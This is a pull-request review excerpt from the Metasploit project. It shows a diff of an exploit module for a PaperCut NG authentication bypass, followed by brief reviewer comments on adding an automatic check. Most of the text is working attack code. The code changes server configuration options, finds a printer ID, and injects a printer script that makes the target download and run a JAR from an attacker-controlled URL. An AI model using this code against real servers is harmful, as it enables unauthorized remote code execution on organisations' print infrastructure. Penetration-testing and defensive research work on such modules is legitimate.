modules/exploits/multi/http/papercut_ng_auth_bypass.rb

```diff
@@ -0,0 +1,282 @@
+      return
+    end
+
+    if datastore['NEVER_SET']
+      print_error("Server is not correctly configured for code execution and you have requested we never set server options 'NEVER_SET'")
+      return Exploit::Failed
+    end
+
+    vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'")
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => @origin
+        },
+        'vars_post' => {
+          'service' => 'direct/1/ConfigEditor/$Form',
+          'sp' => 'S1',
+          'Form1' => '$TextField$0,$Submit,$Submit$0',
+          '$TextField$0' => value,
+          '$Submit' => 'Update'
+        }
+      }
+    )
+  end
+
+  def get_printer
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'service' => 'page/PrinterList'
+        }
+      }
+    )
+    return Exploit::Failed unless res && res.code == 200
+
+    html = res.get_html_document
+    return Exploit::Failed unless html
+
+    printer = html.at('.displayNameColumnValue a')
+    return Exploit::Failed unless printer && printer['href']
+
+    uri = URI(normalize_uri(printer['href']))
+    return Exploit::Failed unless uri
+
+    params = CGI.parse(uri.query)
+    return Exploit::Failed unless params && params['sp']
+
+    return params['sp'][0]
+  end
+
+  def check
+    # For the check command
+    return bypass_auth
+  end
+
+  def primer
+    payload_uri = get_uri
+    # 6) Trigger the code execution the printer_id
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => @origin
+        },
+        'vars_post' => {
+          'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',
+          'sp' => 'S0',
+          'Form0' => 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0,$Submit$1',
+          'enablePrintScript' => 'on',
+          '$Submit$1' => 'Apply',
+          'printerId' => @printer_id,
+          'scriptBody' => %Q{
+var urls = [new java.net.URL("#{payload_uri}.jar")];
+var cl = new java.net.URLClassLoader(urls).loadClass('#{datastore['PAYLOAD_CLASS']}').newInstance().main([]);
+s;
+}
+        }
+      }
+    )
+    return Exploit::Failed unless res && res.code == 200
+  end
+
+  def exploit
+    @payload_uri = get_uri
+    protocol = 'http'
+    if datastore['SSL']
+      protocol = 'https'
+    end
+    @origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}") # required for anti-CSRF mechanisms
+
+    # Main function
+    # 1) Bypass the auth using the SetupCompleted page
+    auth_bypassed = bypass_auth
+    if auth_bypassed == Exploit::CheckCode::Safe
```

Comment:
this can be made less awkward now since we're not checking a check code

Reply:
Also, if you add `prepend Msf::Exploit::Remote::AutoCheck` to this module, it'll do the auto check, so this `if` block can be removed in total.

Reply:
prepend check added here, https://github.com/rapid7/metasploit-framework/pull/17936/commits/5e93669d75e3dc2ba5b18b89e515c8836d66941e

I like it... but it leaves me with state machine questions.